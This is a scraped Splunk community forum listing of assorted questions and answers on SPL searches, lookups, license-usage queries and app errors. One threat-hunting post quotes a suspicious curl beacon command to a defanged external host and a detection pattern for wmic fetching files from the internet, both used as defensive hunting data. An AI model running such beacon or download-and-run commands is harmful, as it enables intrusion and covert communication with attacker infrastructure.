All Posts

Find Answers
Ask questions. Get answers. Find technical product solutions from passionate members of the Splunk community.

All Posts

Hi, im working on creating a dashboard but I'm not familiar with time formatting is there a way some one can help on how to format time to strftime in this search to show on the dashboard: Index=a ... See more...
Hi, im working on creating a dashboard but I'm not familiar with time formatting is there a way some one can help on how to format time to strftime in this search to show on the dashboard: Index=a sourcetype=b earliest=-30d [|inputlookup LU0_siem_asset_list where f_id=*OS-03* | stats values(asset) as search | eval search=mvjoin(search,", OR ")] | fields src src_ip src_f_id _time | stats latest(_time) values(*) by src_ip. Thanks!
We have been using the sentinelone app for splunk cloud for over year lately we are getting the below error. Tried regenerating the api key, no joy error_message="[HTTP 404] https://127.0.0.1:8... See more...
We have been using the sentinelone app for splunk cloud for over year lately we are getting the below error. Tried regenerating the api key, no joy error_message="[HTTP 404] https://127.0.0.1:8089/servicesNS/nobody/sentinelone_app_for_splunk/configs/conf-authhosts/278c8-73f2-d67a-0211-782344bd8727?output_mode=json" error_type="<class 'splunk.ResourceNotFound'>" error_arguments="[HTTP 404] https://127.0.0.1:8089/servicesNS/nobody/sentinelone_app_for_splunk/configs/conf-authhosts/278c8-73f2-d67a-0211-782344bd8727?output_mode=json" error_filename="s1_client.py" error_line_number="164" input_guid="f6cf841-8787-761-d820-d0d36cebfa" input_name="Activity" Error filename: s1_client.py Error line number: 164 Input guid: f6cf841-8787-761-d820-d0d36cebfa Message: [HTTP 404] https://127.0.0.1:8089/servicesNS/nobody/sentinelone_app_for_splunk/configs/conf-authhosts/278c8-73f2-d67a-0211-782344bd8727?output_mode=json  
Hello @sajo.sam, The error message you've encountered "agentregistrationmodule.go:132 - clusterId: -1" indicates that the cluster agent received incorrect controller information or that the control... See more...
Hello @sajo.sam, The error message you've encountered "agentregistrationmodule.go:132 - clusterId: -1" indicates that the cluster agent received incorrect controller information or that the controller is rejecting the registration. To verify if you've configured the correct controller access key, you can execute the following command: kubectl get secret cluster-agent-secret -n appdynamics -o jsonpath='{.data.controller-key}' | base64 --decode Please note that DONOT share any controller sensitive information in this public platform.   Regarding the error mentioned in your comments: [ERROR]: 2024-04-09 11:21:08 - agentregistrationmodule.go:131 - Failed to send agent registration request: Post "accountname.saas.appdynamics.com:8080/sim/v2/agent/clusterRegistration": context deadline exceeded (Client.Timeout exceeded while awaiting headers) This is likely due to a network connection issue. You can check the network connection from one of the running pods using the following command: curl -v -k -u singularity-agent@<accountname>  https://<controllerhost>.saas.appdynamics.com:<port>/sim/v2/agent/clusterRegistration   Please check the above if that helpful. Best Regards, Rajesh Ganapavarapu
I think you should open a support ticket for this.
Hi. I have a lookup file with phone numbers broken down into their parts, so: cc,npa,nxx,list 1,210,5551234,good 1,512,7779876,bad My event stream has e164 phone numbers, so: +12105551234 +1... See more...
Hi. I have a lookup file with phone numbers broken down into their parts, so: cc,npa,nxx,list 1,210,5551234,good 1,512,7779876,bad My event stream has e164 phone numbers, so: +12105551234 +15127779876 i'd like to use the lookup command, but can't find a way to natively join this data and looking for ideas. currently i am able to use join, like this:       ... | join number [ | inputlookup lookupfile.csv | eval number="+".cc.npa.nxx       but I've learned through this group mostly to try and avoid 'join' because of limitations and 'it basically applying SQL and this ain't SQL'. I thought about 'breaking apart' the number field into (3) fields and then passing several looks like in the example page linked above, but this feels backwards when what i'd prefer to do is join the data in the csv. So another idea was to create a report that does that and creates a new CSV (|output lookup), but that feels unnecessary, too. Any thoughts? THANK YOU!        
It says `No results found.`
hi @Glasses2 , did you found a way for this? even I have the same scenario for the migration
Once you have your base cost per day query, you can then add this to do a predictive panel.. [...] | timechart span=1d count(status) as "Error Status Count" | predict "Error Status Count" futu... See more...
Once you have your base cost per day query, you can then add this to do a predictive panel.. [...] | timechart span=1d count(status) as "Error Status Count" | predict "Error Status Count" future_timespan=7 where [...] is your base query and replace 7 with the amount of days you want to predict. This would allow you to take into account changes in the already ingested data ....
We use this query to build our total daily ingest over a rolling 30 days: index=_internal source=*license_usage.log type="RolloverSummary" earliest=-30d@d | eval _time=_time - 43200 | bin _time sp... See more...
We use this query to build our total daily ingest over a rolling 30 days: index=_internal source=*license_usage.log type="RolloverSummary" earliest=-30d@d | eval _time=_time - 43200 | bin _time span=1d | stats latest(b) AS b by slave, pool, _time | timechart span=1d sum(b) AS "Daily Usage" fixedrange=false | fields - _timediff | foreach * [eval <<FIELD>>=round('<<FIELD>>'/1024/1024/1024, 3)] | eval license_threshold = 1000
Would you not be able to divide your cost by the amount of data you can ingest and use that as an estimated cost per say MB then run a query that should you the usage by say day over 30 days then add... See more...
Would you not be able to divide your cost by the amount of data you can ingest and use that as an estimated cost per say MB then run a query that should you the usage by say day over 30 days then add a daily usage * cost per MB to get your daily cost? At least estimated  
I need to see all events with fields that have "PROD*" in name, e.g. "PROD deploy", "PROD update", etc. `index=myIndex sourcetype=mySourceType "PROD*"="*"` doesn't work ..and if event has "PROD*" i... See more...
I need to see all events with fields that have "PROD*" in name, e.g. "PROD deploy", "PROD update", etc. `index=myIndex sourcetype=mySourceType "PROD*"="*"` doesn't work ..and if event has "PROD*" in field name I need to get the value How is it possible?
Hi all, I've a csv file with 3 columns ip, earliest, latest and over 400 rows.  I'm trying to return all evens associated with the IP for an hour before and after the interesting request time.  Th... See more...
Hi all, I've a csv file with 3 columns ip, earliest, latest and over 400 rows.  I'm trying to return all evens associated with the IP for an hour before and after the interesting request time.  The search below works for a single row but I can't figure out how treat each row as a unique search and compile the results at the end.  What appears to happen when I upload multiple rows in the csv is the search will run for all interesting IPs from the earliest earliest value to the latest latest value. It kind of meets the intent but is very wasteful as the index is huge and the times span several years with days/months between them. Is what I'm trying to achieve possible? index=myindex client_ip_address earliest latest [| inputlookup ip_list_2.csv | eval ip = "*" . 'Extracted IP' . "*" | eval earliest=strptime('REQUEST_TIME', "%m/%d/%y %H:%M")-(60*60) | eval latest=strptime('REQUEST_TIME', "%m/%d/%y %H:%M")+(60*60) | fields ip earliest latest ]
@dude49, You would need a field or value that gives you the hire/ start date and then format and eval the value to look for the last 30 days. Something like the below: |eval StartDay=strftime(hire... See more...
@dude49, You would need a field or value that gives you the hire/ start date and then format and eval the value to look for the last 30 days. Something like the below: |eval StartDay=strftime(hire_date, "%d") |eval curDay=strftime(now(),"%d") |eval window =(curDay - StarttDay) |where (window < 30)   Reference:  https://docs.splunk.com/Documentation/SCS/current/SearchReference/DateandTimeFunctions
Hi - To explain, we have ioc_check table with over 100 commands, we are matching this commands with CrowdStrike CommandLine as a hunting perspective. This is the SPL we have which alerts us when Co... See more...
Hi - To explain, we have ioc_check table with over 100 commands, we are matching this commands with CrowdStrike CommandLine as a hunting perspective. This is the SPL we have which alerts us when CommandLine matches with commands string from lookup table. index=crowdstrike event_simpleName=ProcessRollup2 [| inputlookup ioc_check | eval CommandLine="*"+commands+"*" | fields CommandLine] | lookup ioc_check commands AS CommandLine OUTPUT description | table CommandLine, commands, description The results we are getting as: CommandLine commands description curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=2f8bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L http[:]//wvfg.wetmet[.]net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhW...       However, the result we want as this: CommandLine commands description curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=2f8bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L http[:]//wvfg.wetmet[.]net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhW... *wmic*get*http* Using wmic to get and run files from internet   Also, we have Global permissions to All apps for both Lookup table and definition.
I have been asked to alert when a user deletes an index.   I have found the event in the _internal index, but there is no username attached to the event. index=_internal event=removeIndex   ... See more...
I have been asked to alert when a user deletes an index.   I have found the event in the _internal index, but there is no username attached to the event. index=_internal event=removeIndex   05-13-2024 21:57:01.509 +0000 INFO IndexProcessor [1036423 indexerPipe_1] - event=removeIndex index=deleteme is newly marked for deletion, avoided restart There does not appear to be a corresponding event in the _audit index, so I'm drawing a blank on how to attribute the event to a user account. The solution provided here doesn't appear to work, as I'm not seeing an operations or object field in the _audit index. 
 
I am not sure I understand - if it matches, what gets returned? Also, what permissions/scope do you have on you have on your lookup file and lookup definition? (Make sure they are accessible by all ... See more...
I am not sure I understand - if it matches, what gets returned? Also, what permissions/scope do you have on you have on your lookup file and lookup definition? (Make sure they are accessible by all apps)
@tscroggins @VatsalJagani  Thanks For sharing the refrence links. I am very close to setup the secure SSL connection by using openssl. Once completely done I will share the complete steps here also.
Yes, it does matches, but I am struggling with displaying command and description in final result. As per my logic above when I use the  | table CommandLine, commands, description ---- it just displ... See more...
Yes, it does matches, but I am struggling with displaying command and description in final result. As per my logic above when I use the  | table CommandLine, commands, description ---- it just displays CommandLine, and column commands, description comes as blank.
I have not personally tried this API, but based on API Doc, you can try and then ask follow up question based on errors it is generating.   Or you can even create Splunk Support ticket if something... See more...
I have not personally tried this API, but based on API Doc, you can try and then ask follow up question based on errors it is generating.   Or you can even create Splunk Support ticket if something is not working as described in the Doc.